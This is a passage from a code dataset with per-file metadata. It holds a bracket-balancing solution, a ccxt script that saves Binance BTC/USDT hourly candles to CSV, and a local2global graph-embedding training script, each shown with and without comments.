for i in range( len(s) ):
char = s[i]
if char in { '{', '[', '(' } :
# push into stack
_stack.append( char )
if char in { '}', ']', ')' } :
# pop from stack and compare with left symbol
index_of_right = right_symbol.index( char )
index_of_left = left_symbol.index( _stack.pop(-1) )
if index_of_left == index_of_right:
# match of {}, [], or ()
pass
else:
return "NO"
if len(_stack) == 0:
return "YES"
else:
return "NO"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
s = input()
result = isBalanced(s)
fptr.write(result + '\n')
fptr.close()
| 17.702703
| 63
| 0.499237
|
import math
import os
import random
import re
import sys
def isBalanced(s):
left_symbol = [ '{', '[', '(']
right_symbol = [ '}', ']', ')']
for i in range(3):
left_count = s.count( left_symbol[i] )
right_count = s.count( right_symbol[i] )
if left_count != right_count:
return "NO"
_stack = []
for i in range( len(s) ):
char = s[i]
if char in { '{', '[', '(' } :
_stack.append( char )
if char in { '}', ']', ')' } :
index_of_right = right_symbol.index( char )
index_of_left = left_symbol.index( _stack.pop(-1) )
if index_of_left == index_of_right:
pass
else:
return "NO"
if len(_stack) == 0:
return "YES"
else:
return "NO"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
s = input()
result = isBalanced(s)
fptr.write(result + '\n')
fptr.close()
| true
| true
|
790b06f7d961da5eefda7131950028b89915e567
| 3,008
|
py
|
Python
|
binance-fetch-ohlcv-to-csv.py
|
yinfeng2016/Bitcoin-Trader-RL
|
cd75848fa89f076ee3d91cf2b866b8160a038b30
|
[
"MIT"
] | null | null | null |
binance-fetch-ohlcv-to-csv.py
|
yinfeng2016/Bitcoin-Trader-RL
|
cd75848fa89f076ee3d91cf2b866b8160a038b30
|
[
"MIT"
] | null | null | null |
binance-fetch-ohlcv-to-csv.py
|
yinfeng2016/Bitcoin-Trader-RL
|
cd75848fa89f076ee3d91cf2b866b8160a038b30
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import csv
# -----------------------------------------------------------------------------
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(root + '/python')
import ccxt # noqa: E402
# -----------------------------------------------------------------------------
def retry_fetch_ohlcv(exchange, max_retries, symbol, timeframe, since, limit):
num_retries = 0
try:
num_retries += 1
ohlcv = exchange.fetch_ohlcv(symbol, timeframe, since, limit)
# print('Fetched', len(ohlcv), symbol, 'candles from', exchange.iso8601 (ohlcv[0][0]), 'to', exchange.iso8601 (ohlcv[-1][0]))
return ohlcv
except Exception:
if num_retries > max_retries:
raise # Exception('Failed to fetch', timeframe, symbol, 'OHLCV in', max_retries, 'attempts')
def scrape_ohlcv(exchange, max_retries, symbol, timeframe, since, limit):
earliest_timestamp = exchange.milliseconds()
timeframe_duration_in_seconds = exchange.parse_timeframe(timeframe)
timeframe_duration_in_ms = timeframe_duration_in_seconds * 1000
timedelta = limit * timeframe_duration_in_ms
all_ohlcv = []
while True:
fetch_since = earliest_timestamp - timedelta
ohlcv = retry_fetch_ohlcv(exchange, max_retries, symbol, timeframe, fetch_since, limit)
# if we have reached the beginning of history
if ohlcv[0][0] >= earliest_timestamp:
break
earliest_timestamp = ohlcv[0][0]
all_ohlcv = ohlcv + all_ohlcv
print(len(all_ohlcv), 'candles in total from', exchange.iso8601(all_ohlcv[0][0]), 'to', exchange.iso8601(all_ohlcv[-1][0]))
# if we have reached the checkpoint
if fetch_since < since:
break
return all_ohlcv
def write_to_csv(filename, data):
with open(filename, mode='w', newline = '') as output_file:
csv_writer = csv.writer(output_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerows(data)
def scrape_candles_to_csv(filename, exchange_id, max_retries, symbol, timeframe, since, limit):
# instantiate the exchange by id
exchange = getattr(ccxt, exchange_id)({
'enableRateLimit': True, # required by the Manual
})
# convert since from string to milliseconds integer if needed
if isinstance(since, str):
since = exchange.parse8601(since)
# preload all markets from the exchange
exchange.load_markets()
# fetch all candles
ohlcv = scrape_ohlcv(exchange, max_retries, symbol, timeframe, since, limit)
# save them to csv file
write_to_csv(filename, ohlcv)
print('Saved', len(ohlcv), 'candles from', exchange.iso8601(ohlcv[0][0]), 'to', exchange.iso8601(ohlcv[-1][0]), 'to', filename)
# -----------------------------------------------------------------------------
scrape_candles_to_csv('binance_3.csv', 'binance', 3, 'BTC/USDT', '1h', '2019-05-01T00:00:00Z', 100)
| 39.578947
| 133
| 0.628657
|
import os
import sys
import csv
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(root + '/python')
import ccxt
def retry_fetch_ohlcv(exchange, max_retries, symbol, timeframe, since, limit):
num_retries = 0
try:
num_retries += 1
ohlcv = exchange.fetch_ohlcv(symbol, timeframe, since, limit)
return ohlcv
except Exception:
if num_retries > max_retries:
raise
def scrape_ohlcv(exchange, max_retries, symbol, timeframe, since, limit):
earliest_timestamp = exchange.milliseconds()
timeframe_duration_in_seconds = exchange.parse_timeframe(timeframe)
timeframe_duration_in_ms = timeframe_duration_in_seconds * 1000
timedelta = limit * timeframe_duration_in_ms
all_ohlcv = []
while True:
fetch_since = earliest_timestamp - timedelta
ohlcv = retry_fetch_ohlcv(exchange, max_retries, symbol, timeframe, fetch_since, limit)
if ohlcv[0][0] >= earliest_timestamp:
break
earliest_timestamp = ohlcv[0][0]
all_ohlcv = ohlcv + all_ohlcv
print(len(all_ohlcv), 'candles in total from', exchange.iso8601(all_ohlcv[0][0]), 'to', exchange.iso8601(all_ohlcv[-1][0]))
if fetch_since < since:
break
return all_ohlcv
def write_to_csv(filename, data):
with open(filename, mode='w', newline = '') as output_file:
csv_writer = csv.writer(output_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerows(data)
def scrape_candles_to_csv(filename, exchange_id, max_retries, symbol, timeframe, since, limit):
# instantiate the exchange by id
exchange = getattr(ccxt, exchange_id)({
'enableRateLimit': True, # required by the Manual
})
# convert since from string to milliseconds integer if needed
if isinstance(since, str):
since = exchange.parse8601(since)
# preload all markets from the exchange
exchange.load_markets()
# fetch all candles
ohlcv = scrape_ohlcv(exchange, max_retries, symbol, timeframe, since, limit)
# save them to csv file
write_to_csv(filename, ohlcv)
print('Saved', len(ohlcv), 'candles from', exchange.iso8601(ohlcv[0][0]), 'to', exchange.iso8601(ohlcv[-1][0]), 'to', filename)
# -----------------------------------------------------------------------------
scrape_candles_to_csv('binance_3.csv', 'binance', 3, 'BTC/USDT', '1h', '2019-05-01T00:00:00Z', 100)
| true
| true
|
790b07891b7b81348e644b5d2b4ad376f79cff20
| 21,906
|
py
|
Python
|
local2global_embedding/run.py
|
LJeub/Local2Global_embedding
|
22e1818639043444f97655d944997a171b992745
|
[
"MIT"
] | null | null | null |
local2global_embedding/run.py
|
LJeub/Local2Global_embedding
|
22e1818639043444f97655d944997a171b992745
|
[
"MIT"
] | null | null | null |
local2global_embedding/run.py
|
LJeub/Local2Global_embedding
|
22e1818639043444f97655d944997a171b992745
|
[
"MIT"
] | null | null | null |
"""Training run script"""
import argparse
import json
from pathlib import Path
from bisect import bisect_left
import torch
import torch_geometric as tg
import matplotlib.pyplot as plt
import local2global as l2g
from local2global_embedding.embedding import speye, train, embedding, VGAE_model, VGAE_loss, reconstruction_auc
from local2global_embedding.network import largest_connected_component, TGraph
from local2global_embedding.patches import create_patch_data
from local2global_embedding.clustering import distributed_clustering, fennel_clustering, louvain_clustering, metis_clustering
class ResultsDict:
"""
Class for keeping track of results
"""
@classmethod
def load(cls, filename, replace=False):
"""
restore results from file
Args:
filename: input json file
replace: set the replace attribute
Returns:
populated ResultsDict
"""
self = cls(replace=replace)
with open(filename) as f:
self._data.update(json.load(f))
return self
def save(self, filename):
"""
dump contents to json file
Args:
filename: output file path
"""
with open(filename, 'w') as f:
json.dump(self._data, f)
def __init__(self, replace=False):
"""
initialise empty ResultsDict
Args:
replace: set the replace attribute (default: ``False``)
"""
self._data = {'dims': [], 'auc': [], 'args': []}
self.replace = replace #: if ``True``, updates replace existing data, if ``False``, updates append data
def __getitem__(self, item):
return self._data[item]
def _update_index(self, index, aucs: list, args=None):
"""
update data for a given index
Args:
index: integer index into data lists
aucs: new auc values (should be a list)
args: new args data (optional)
"""
if self.replace:
self['auc'][index] = aucs
self['args'][index] = args
else:
self['auc'][index].extend(aucs)
self['args'][index].extend([args] * len(aucs))
def _insert_index(self, index: int, dim: int, aucs: list, args=None):
"""
insert new data at index
Args:
index: integer index into data lists
dim: data dimension for index
aucs: new auc values
args: new args data (optional)
"""
self['auc'].insert(index, aucs)
self['dims'].insert(index, dim)
self['args'].insert(index, [args] * len(aucs))
def update_dim(self, dim, aucs, args=None):
"""
update data for given dimension
Args:
dim: dimension to update
aucs: new auc values
args: new args data (optional)
if ``self.contains_dim(dim) == True``, behaviour depends on the value of
``self.replace``
"""
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
self._update_index(index, aucs, args)
else:
self._insert_index(index, dim, aucs, args)
def max_auc(self, dim=None):
"""
return maximum auc values
Args:
dim: if ``dim=None``, return list of values for all dimension, else only return maximum value for ``dim``.
"""
if dim is None:
return [max(aucs) for aucs in self['auc']]
else:
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
return max(self['auc'][index])
else:
return 0.
def contains_dim(self, dim):
"""
equivalent to ``dim in self['dims']``
"""
index = bisect_left(self['dims'], dim)
return index < len(self['dims']) and self['dims'][index] == dim
def reduce_to_dims(self, dims):
"""
remove all data for dimensions not in ``dims``
Args:
dims: list of dimensions to keep
"""
index = [i for i, d in enumerate(dims) if self.contains_dim(d)]
for key1 in self._data:
if isinstance(self._data[key1], list):
self._data[key1] = [self[key1][i] for i in index]
return self
def runs(self, dim=None):
"""
return the number of runs
Args:
dim: if ``dim is None``, return list of number of runs for all dimension, else return number of
runs for dimension ``dim``.
"""
if dim is None:
return [len(x) for x in self['auc']]
else:
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
return len(self['auc'][index])
else:
return 0
_dataloaders = {} #: dataloaders
def dataloader(name):
"""
decorator for registering dataloader functions
Args:
name: data set name
"""
def loader(func):
_dataloaders[name] = func
return func
return loader
@dataloader('Cora')
def _load_cora():
return tg.datasets.Planetoid(name='Cora', root='/tmp/cora')[0]
@dataloader('PubMed')
def _load_pubmed():
return tg.datasets.Planetoid(name='PubMed', root='/tmp/pubmed')[0]
@dataloader('AMZ_computers')
def _load_amazon_computers():
return tg.datasets.Amazon(root='/tmp/amazon', name='Computers')[0]
@dataloader('AMZ_photo')
def _load_amazon_photos():
return tg.datasets.Amazon(root='/tmp/amazon', name='photo')[0]
def load_data(name):
"""
load data set
Args:
name: name of data set (one of {names})
Returns:
largest connected component of data set
"""
data = _dataloaders[name]()
data = largest_connected_component(data=data)
data.num_nodes = data.x.shape[0]
return data
load_data.__doc__ = load_data.__doc__.format(names=list(_dataloaders.keys()))
def prepare_patches(output_folder, **kwargs):
"""
initialise patch data if ``output_folder`` does not exist, else load existing patch data
Args:
output_folder: folder for storing patch data
**kwargs: arguments passed to :py:func:`~local2global_embedding.patches.create_patch_data`
Returns:
patch_data, patch_graph
"""
output_folder = Path(output_folder)
if output_folder.is_dir():
patch_graph = torch.load(output_folder / 'patch_graph.pt')
patch_data = [torch.load(output_folder / f"patch{i}.pt") for i in range(patch_graph.num_nodes)]
else:
patch_data, patch_graph = create_patch_data(**kwargs)
output_folder.mkdir(parents=True)
torch.save(patch_graph, output_folder / 'patch_graph.pt')
for i, data in enumerate(patch_data):
torch.save(data, output_folder / f'patch{i}.pt')
return patch_data, patch_graph
def csvlist(input_type=str):
"""
Create an argparse type that parses comma separated lists of type ``input_type``
Args:
input_type: type of list elements
Returns:
list parser
"""
def make_list(input_str):
return [input_type(s) for s in input_str.split(',')]
make_list.__doc__ = f"""
argparse type that parses comma separated list of type {input_type}
Args:
input_str: string to be parsed
Returns:
list of elements of type {input_type}
"""
return make_list
_parser = argparse.ArgumentParser(description="Run training example.")
_parser.add_argument('--data', default='Cora', choices=_dataloaders.keys(), help='Dataset to load')
_parser.add_argument('--no_features', action='store_true', help='Discard features and use node identity.')
_parser.add_argument('--num_epochs', type=int, default=200, help='Number of training epochs')
_parser.add_argument('--runs', type=int, default=10, help='Number of training runs (keep best result)')
_parser.add_argument('--dims', type=csvlist(int), default=[2], help='Embedding dimensions (comma-separated)')
_parser.add_argument('--hidden_multiplier', type=int, default=2, help='Hidden dim is `hidden_multiplier` * `dim`')
_parser.add_argument('--target_patch_degree', type=float, default=4.0, help='Target patch degree for sparsification.')
_parser.add_argument('--min_overlap', type=int, default=None, help='Minimum target patch overlap (defaults to `max(dims) + 1`)')
_parser.add_argument('--target_overlap', type=int, default=None, help='Target patch overlap (defaults to twice `min_overlap`)')
_parser.add_argument('--gamma', type=float, default=0.0, help="Value of 'gamma' for RMST sparsification.")
_parser.add_argument('--sparsify', default='resistance', help="Sparsification method to use.",
choices={'resistance', 'rmst', 'none'})
_parser.add_argument('--cluster', default='metis', choices={'louvain', 'distributed', 'fennel', 'metis'}, help="Clustering method to use")
_parser.add_argument('--num_clusters', default=10, type=int, help="Target number of clusters for fennel, or metis.")
_parser.add_argument('--beta', default=0.1, type=float, help="Beta value for distributed")
_parser.add_argument('--num_iters', default=None, type=int, help="Maximum iterations for distributed or fennel (default depends on method choice)")
_parser.add_argument('--lr', default=0.01, type=float, help='Learning rate')
_parser.add_argument('--dist', action='store_true', help='use distance decoder instead of inner product decoder')
_parser.add_argument('--output',
default='.',
help='output folder')
_parser.add_argument('--device', default=None, help="Device used for training e.g., 'cpu', 'cuda'")
_parser.add_argument('--plot', action='store_true', help='Plot embedding performance')
_parser.add_argument('--verbose', action='store_true', help='Show progress info')
def run(**kwargs):
"""
Run training example.
By default this function writes results to the current working directory. To override this use the ``output``
keyword argument.
This function reproduces figure 1(a) of [#l2g]_ if called as ``run(dims=[2**i for i in range(1, 8)], plot=True)``.
Keyword Args:
data: Name of data set to load (one of {``'Cora'``, ``'PubMed'``, ``'AMZ_computers'``, ``'AMZ_photo'``}) (default: ``'Cora'``)
no_features: If ``True``, discard features and use node identity. (default: ``False``)
num_epochs: Number of training epochs (default: ``200``)
runs: Number of training runs (keep best result) (default: ``1``)
dims: list of embedding dimensions (default: ``[2]``)
hidden_multiplier: Hidden dimension is ``hidden_multiplier * dim``
target_patch_degree: Target patch degree for resistance sparsification. (default: ``4``)
min_overlap: Minimum target patch overlap (default: ``max(dims) + 1``)
target_overlap: Target patch overlap (default: ``2 * max(dims)``)
gamma: Value of 'gamma' for RMST sparsification (default: ``0``)
sparsify: Sparsification method to use (one of {``'resistance'``, ``'none'``, ``'rmst'``})
(default: ``'resistance'``)
cluster: Clustering method to use (one of {``'louvain'``, ``'fennel'`` , ``'distributed'``, ``'metis'``})
(default: ``'metis'``)
num_clusters: Target number of clusters for distributed, fennel, or metis.
num_iters: Maximum iterations for distributed or fennel
lr: Learning rate
dist: If ``True``, use distance decoder instead of inner product decoder (default: ``False``)
output: output folder (default: ``'.'``)
device: Device used for training e.g., 'cpu', 'cuda' (defaults to ``'cuda'`` if available else ``'cpu'``)
plot: If ``True``, plot embedding performance (default: ``False``)
verbose: If ``True``, show progress info (default: ``False``)
This function only accepts keyword arguments and is also exposed as a command-line interface.
.. rubric:: References
.. [#l2g] L. G. S. Jeub et al.
“Local2Global: Scaling global representation learning on graphs via local training”.
DLG-KDD’21. 2021. `arXiv:2107.12224 [cs.LG] <https://arxiv.org/abs/2107.12224>`_.
"""
# support calling this as a python function with keyword arguments
args = _parser.parse_args([])
for key, value in kwargs.items():
if key in args:
setattr(args, key, value)
else:
raise TypeError(f'Unknown argument {key}')
output_folder = Path(args.output)
data = load_data(args.data)
neg_edges = tg.utils.negative_sampling(data.edge_index, data.num_nodes)
graph = TGraph(data.edge_index, data.edge_attr)
basename = args.data
dims = args.dims
num_epochs = args.num_epochs
runs = args.runs
min_overlap = args.min_overlap if args.min_overlap is not None else max(dims) + 1
target_overlap = args.target_overlap if args.target_overlap is not None else 2 * max(dims)
if args.no_features:
data.x = None # remove node features (trained with identity)
basename += '_no_features'
if args.dist:
basename += '_dist'
if args.sparsify == 'resistance':
sp_string = f"resistance_deg{args.target_patch_degree}"
elif args.sparsify == 'rmst':
sp_string = f"rmst_gamma{args.gamma}"
elif args.sparsify == 'none':
sp_string = "no_sparsify"
else:
raise RuntimeError(f"Unknown sparsification method '{args.sparsify}'.")
if args.cluster == 'louvain':
cluster_fun = lambda: louvain_clustering(graph)
cluster_string = 'louvain'
elif args.cluster == 'distributed':
cluster_fun = lambda: distributed_clustering(graph, args.beta, rounds=args.num_iters)
cluster_string = f'distributed_beta{args.beta}_it{args.num_iters}'
elif args.cluster == 'fennel':
cluster_fun = lambda: fennel_clustering(graph, num_clusters=args.num_clusters, randomise_order=True,
num_iters=args.num_iters)
cluster_string = f"fennel_n{args.num_clusters}_it{args.num_iters}"
elif args.cluster == 'metis':
cluster_fun = lambda: metis_clustering(graph, num_clusters=args.num_clusters)
cluster_string = f"metis_n{args.num_clusters}"
else:
raise RuntimeError(f"Unknown cluster method '{args.cluster}'.")
cluster_file = output_folder / f"{args.data}_{cluster_string}_clusters.pt"
if cluster_file.is_file():
clusters = torch.load(cluster_file)
else:
clusters = cluster_fun()
torch.save(clusters, cluster_file)
patch_folder = output_folder / f'{args.data}_{cluster_string}_{sp_string}_mo{min_overlap}_to{target_overlap}_patches'
patch_data, patch_graph = prepare_patches(
output_folder=patch_folder,
data=data,
partition_tensor=clusters,
min_overlap=min_overlap,
target_overlap=target_overlap,
sparsify_method=args.sparsify,
gamma=args.gamma,
target_patch_degree=args.target_patch_degree,
verbose=args.verbose)
if args.verbose:
print(f'total edges: {data.num_edges}')
print(f'total patch edges: {sum(c.num_edges for c in patch_data)}')
if args.no_features:
data.x = speye(data.num_nodes) # add identity as node features for training full model
# compute baseline full model if necessary
baseline_file = output_folder / f'{basename}_full_info.json'
training_args = {'lr': args.lr, 'num_epochs': args.num_epochs, 'hidden_multiplier': args.hidden_multiplier}
if baseline_file.is_file():
baseline_data = ResultsDict.load(baseline_file)
else:
baseline_data = ResultsDict()
for d in dims:
r = baseline_data.runs(d)
if r < runs:
if args.verbose:
print(f'training full model for {runs-r} runs and d={d}')
for r_it in range(r, runs):
if args.verbose:
print(f"full model (d={d}) run {r_it + 1} of {runs}")
data = data.to(args.device)
model = train(data,
VGAE_model(d, d * args.hidden_multiplier, data.num_features, dist=args.dist).to(args.device),
loss_fun=VGAE_loss,
num_epochs=num_epochs,
lr=args.lr,
verbose=args.verbose,
)
coords = embedding(model, data)
auc = reconstruction_auc(coords, data, dist=args.dist)
if auc > baseline_data.max_auc(d):
if args.verbose:
print(f"new best (auc={auc})")
torch.save(model.state_dict(), output_folder / f'{basename}_full_d{d}_best_model.pt')
torch.save(coords, output_folder / f'{basename}_full_d{d}_best_coords.pt')
baseline_data.update_dim(d, [auc], training_args)
baseline_data.save(baseline_file)
results_file = patch_folder / f'{basename}_l2g_info.json'
nt_results_file = patch_folder / f'{basename}_nt_info.json'
if results_file.is_file():
results = ResultsDict.load(results_file, replace=True)
else:
results = ResultsDict(replace=True)
if nt_results_file.is_file():
nt_results = ResultsDict.load(nt_results_file, replace=True)
else:
nt_results = ResultsDict(replace=True)
for d in dims:
patch_list = []
update_aligned_embedding = False
for p_ind, patch in enumerate(patch_data):
patch_result_file = patch_folder / f'{basename}_patch{p_ind}_info.json'
if patch_result_file.is_file():
patch_results = ResultsDict.load(patch_result_file)
else:
patch_results = ResultsDict()
coords_file = patch_folder / f'{basename}_patch{p_ind}_d{d}_best_coords.pt'
if coords_file.is_file():
best_coords = torch.load(coords_file)
r = patch_results.runs(d)
if args.no_features:
patch.x = speye(patch.num_nodes)
if r < runs:
if args.verbose:
print(f'training patch{p_ind} for {runs-r} runs and d={d}')
patch = patch.to(args.device)
for r_it in range(r, runs):
if args.verbose:
print(f"patch{p_ind} (d={d}) run {r_it+1} of {runs}")
model = train(patch,
VGAE_model(d, d * args.hidden_multiplier, patch.num_features, dist=args.dist).to(args.device),
loss_fun=VGAE_loss,
num_epochs=num_epochs,
lr=args.lr,
)
coords = embedding(model, patch)
auc = reconstruction_auc(coords, patch, dist=args.dist)
if auc > patch_results.max_auc(d):
if args.verbose:
print(f"new best (auc={auc})")
best_coords = coords
torch.save(model.state_dict(), patch_folder / f'{basename}_patch{p_ind}_d{d}_best_model.pt')
torch.save(best_coords, coords_file)
update_aligned_embedding = True
patch_results.update_dim(d, [auc], training_args)
patch_results.save(patch_result_file)
patch_list.append(l2g.Patch(patch.nodes.cpu().numpy(), best_coords.cpu().numpy()))
patched_embedding_file = patch_folder / f'{basename}_d{d}_coords.pt'
patched_embedding_file_nt = patch_folder / f'{basename}_d{d}_ntcoords.pt'
if update_aligned_embedding or not patched_embedding_file.is_file():
prob = l2g.WeightedAlignmentProblem(patch_list, patch_edges=patch_graph.edges())
ntcoords = prob.mean_embedding()
coords = prob.get_aligned_embedding()
torch.save(coords, patched_embedding_file)
torch.save(ntcoords, patched_embedding_file_nt)
results.update_dim(d, [reconstruction_auc(torch.as_tensor(coords), data, neg_edges, dist=args.dist)])
nt_results.update_dim(d, [reconstruction_auc(torch.as_tensor(ntcoords), data, neg_edges, dist=args.dist)])
results.save(results_file)
nt_results.save(nt_results_file)
baseline_data = baseline_data.reduce_to_dims(dims)
results = results.reduce_to_dims(dims)
nt_results = nt_results.reduce_to_dims(dims)
if args.plot:
plt.figure()
plt.plot(dims, [max(v) for v in baseline_data['auc']], label='full, inner product', marker='o',
color='tab:blue')
plt.plot(dims, results['auc'], '--', label='l2g, inner product', marker='>', color='tab:blue')
plt.plot(dims, nt_results['auc'], ':', label='no-trans, inner product', color='tab:blue',
linewidth=1)
plt.xscale('log')
plt.xticks(dims, dims)
plt.minorticks_off()
plt.xlabel('embedding dimension')
plt.ylabel('AUC')
plt.legend()
oversampling_ratio = sum(p.num_edges for p in patch_data) / data.num_edges
plt.title(f"oversampling ratio: {oversampling_ratio:.2}, #patches: {len(patch_data)}")
plt.savefig(output_folder / f"{basename}_{cluster_string}_{sp_string}_mo{min_overlap}_to{target_overlap}.pdf")
plt.show()
if __name__ == '__main__':
# run main script
args = _parser.parse_args()
run(**vars(args))
| 39.61302
| 147
| 0.61773
|
import argparse
import json
from pathlib import Path
from bisect import bisect_left
import torch
import torch_geometric as tg
import matplotlib.pyplot as plt
import local2global as l2g
from local2global_embedding.embedding import speye, train, embedding, VGAE_model, VGAE_loss, reconstruction_auc
from local2global_embedding.network import largest_connected_component, TGraph
from local2global_embedding.patches import create_patch_data
from local2global_embedding.clustering import distributed_clustering, fennel_clustering, louvain_clustering, metis_clustering
class ResultsDict:
@classmethod
def load(cls, filename, replace=False):
self = cls(replace=replace)
with open(filename) as f:
self._data.update(json.load(f))
return self
def save(self, filename):
with open(filename, 'w') as f:
json.dump(self._data, f)
def __init__(self, replace=False):
self._data = {'dims': [], 'auc': [], 'args': []}
self.replace = replace
def __getitem__(self, item):
return self._data[item]
def _update_index(self, index, aucs: list, args=None):
if self.replace:
self['auc'][index] = aucs
self['args'][index] = args
else:
self['auc'][index].extend(aucs)
self['args'][index].extend([args] * len(aucs))
def _insert_index(self, index: int, dim: int, aucs: list, args=None):
self['auc'].insert(index, aucs)
self['dims'].insert(index, dim)
self['args'].insert(index, [args] * len(aucs))
def update_dim(self, dim, aucs, args=None):
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
self._update_index(index, aucs, args)
else:
self._insert_index(index, dim, aucs, args)
def max_auc(self, dim=None):
if dim is None:
return [max(aucs) for aucs in self['auc']]
else:
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
return max(self['auc'][index])
else:
return 0.
def contains_dim(self, dim):
index = bisect_left(self['dims'], dim)
return index < len(self['dims']) and self['dims'][index] == dim
def reduce_to_dims(self, dims):
index = [i for i, d in enumerate(dims) if self.contains_dim(d)]
for key1 in self._data:
if isinstance(self._data[key1], list):
self._data[key1] = [self[key1][i] for i in index]
return self
def runs(self, dim=None):
if dim is None:
return [len(x) for x in self['auc']]
else:
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
return len(self['auc'][index])
else:
return 0
_dataloaders = {}
def dataloader(name):
def loader(func):
_dataloaders[name] = func
return func
return loader
@dataloader('Cora')
def _load_cora():
return tg.datasets.Planetoid(name='Cora', root='/tmp/cora')[0]
@dataloader('PubMed')
def _load_pubmed():
return tg.datasets.Planetoid(name='PubMed', root='/tmp/pubmed')[0]
@dataloader('AMZ_computers')
def _load_amazon_computers():
return tg.datasets.Amazon(root='/tmp/amazon', name='Computers')[0]
@dataloader('AMZ_photo')
def _load_amazon_photos():
return tg.datasets.Amazon(root='/tmp/amazon', name='photo')[0]
def load_data(name):
data = _dataloaders[name]()
data = largest_connected_component(data=data)
data.num_nodes = data.x.shape[0]
return data
load_data.__doc__ = load_data.__doc__.format(names=list(_dataloaders.keys()))
def prepare_patches(output_folder, **kwargs):
output_folder = Path(output_folder)
if output_folder.is_dir():
patch_graph = torch.load(output_folder / 'patch_graph.pt')
patch_data = [torch.load(output_folder / f"patch{i}.pt") for i in range(patch_graph.num_nodes)]
else:
patch_data, patch_graph = create_patch_data(**kwargs)
output_folder.mkdir(parents=True)
torch.save(patch_graph, output_folder / 'patch_graph.pt')
for i, data in enumerate(patch_data):
torch.save(data, output_folder / f'patch{i}.pt')
return patch_data, patch_graph
def csvlist(input_type=str):
def make_list(input_str):
return [input_type(s) for s in input_str.split(',')]
make_list.__doc__ = f"""
argparse type that parses comma separated list of type {input_type}
Args:
input_str: string to be parsed
Returns:
list of elements of type {input_type}
"""
return make_list
_parser = argparse.ArgumentParser(description="Run training example.")
_parser.add_argument('--data', default='Cora', choices=_dataloaders.keys(), help='Dataset to load')
_parser.add_argument('--no_features', action='store_true', help='Discard features and use node identity.')
_parser.add_argument('--num_epochs', type=int, default=200, help='Number of training epochs')
_parser.add_argument('--runs', type=int, default=10, help='Number of training runs (keep best result)')
_parser.add_argument('--dims', type=csvlist(int), default=[2], help='Embedding dimensions (comma-separated)')
_parser.add_argument('--hidden_multiplier', type=int, default=2, help='Hidden dim is `hidden_multiplier` * `dim`')
_parser.add_argument('--target_patch_degree', type=float, default=4.0, help='Target patch degree for sparsification.')
_parser.add_argument('--min_overlap', type=int, default=None, help='Minimum target patch overlap (defaults to `max(dims) + 1`)')
_parser.add_argument('--target_overlap', type=int, default=None, help='Target patch overlap (defaults to twice `min_overlap`)')
_parser.add_argument('--gamma', type=float, default=0.0, help="Value of 'gamma' for RMST sparsification.")
_parser.add_argument('--sparsify', default='resistance', help="Sparsification method to use.",
choices={'resistance', 'rmst', 'none'})
_parser.add_argument('--cluster', default='metis', choices={'louvain', 'distributed', 'fennel', 'metis'}, help="Clustering method to use")
_parser.add_argument('--num_clusters', default=10, type=int, help="Target number of clusters for fennel, or metis.")
_parser.add_argument('--beta', default=0.1, type=float, help="Beta value for distributed")
_parser.add_argument('--num_iters', default=None, type=int, help="Maximum iterations for distributed or fennel (default depends on method choice)")
_parser.add_argument('--lr', default=0.01, type=float, help='Learning rate')
_parser.add_argument('--dist', action='store_true', help='use distance decoder instead of inner product decoder')
_parser.add_argument('--output',
default='.',
help='output folder')
_parser.add_argument('--device', default=None, help="Device used for training e.g., 'cpu', 'cuda'")
_parser.add_argument('--plot', action='store_true', help='Plot embedding performance')
_parser.add_argument('--verbose', action='store_true', help='Show progress info')
def run(**kwargs):
args = _parser.parse_args([])
for key, value in kwargs.items():
if key in args:
setattr(args, key, value)
else:
raise TypeError(f'Unknown argument {key}')
output_folder = Path(args.output)
data = load_data(args.data)
neg_edges = tg.utils.negative_sampling(data.edge_index, data.num_nodes)
graph = TGraph(data.edge_index, data.edge_attr)
basename = args.data
dims = args.dims
num_epochs = args.num_epochs
runs = args.runs
min_overlap = args.min_overlap if args.min_overlap is not None else max(dims) + 1
target_overlap = args.target_overlap if args.target_overlap is not None else 2 * max(dims)
if args.no_features:
data.x = None
basename += '_no_features'
if args.dist:
basename += '_dist'
if args.sparsify == 'resistance':
sp_string = f"resistance_deg{args.target_patch_degree}"
elif args.sparsify == 'rmst':
sp_string = f"rmst_gamma{args.gamma}"
elif args.sparsify == 'none':
sp_string = "no_sparsify"
else:
raise RuntimeError(f"Unknown sparsification method '{args.sparsify}'.")
if args.cluster == 'louvain':
cluster_fun = lambda: louvain_clustering(graph)
cluster_string = 'louvain'
elif args.cluster == 'distributed':
cluster_fun = lambda: distributed_clustering(graph, args.beta, rounds=args.num_iters)
cluster_string = f'distributed_beta{args.beta}_it{args.num_iters}'
elif args.cluster == 'fennel':
cluster_fun = lambda: fennel_clustering(graph, num_clusters=args.num_clusters, randomise_order=True,
num_iters=args.num_iters)
cluster_string = f"fennel_n{args.num_clusters}_it{args.num_iters}"
elif args.cluster == 'metis':
cluster_fun = lambda: metis_clustering(graph, num_clusters=args.num_clusters)
cluster_string = f"metis_n{args.num_clusters}"
else:
raise RuntimeError(f"Unknown cluster method '{args.cluster}'.")
cluster_file = output_folder / f"{args.data}_{cluster_string}_clusters.pt"
if cluster_file.is_file():
clusters = torch.load(cluster_file)
else:
clusters = cluster_fun()
torch.save(clusters, cluster_file)
patch_folder = output_folder / f'{args.data}_{cluster_string}_{sp_string}_mo{min_overlap}_to{target_overlap}_patches'
patch_data, patch_graph = prepare_patches(
output_folder=patch_folder,
data=data,
partition_tensor=clusters,
min_overlap=min_overlap,
target_overlap=target_overlap,
sparsify_method=args.sparsify,
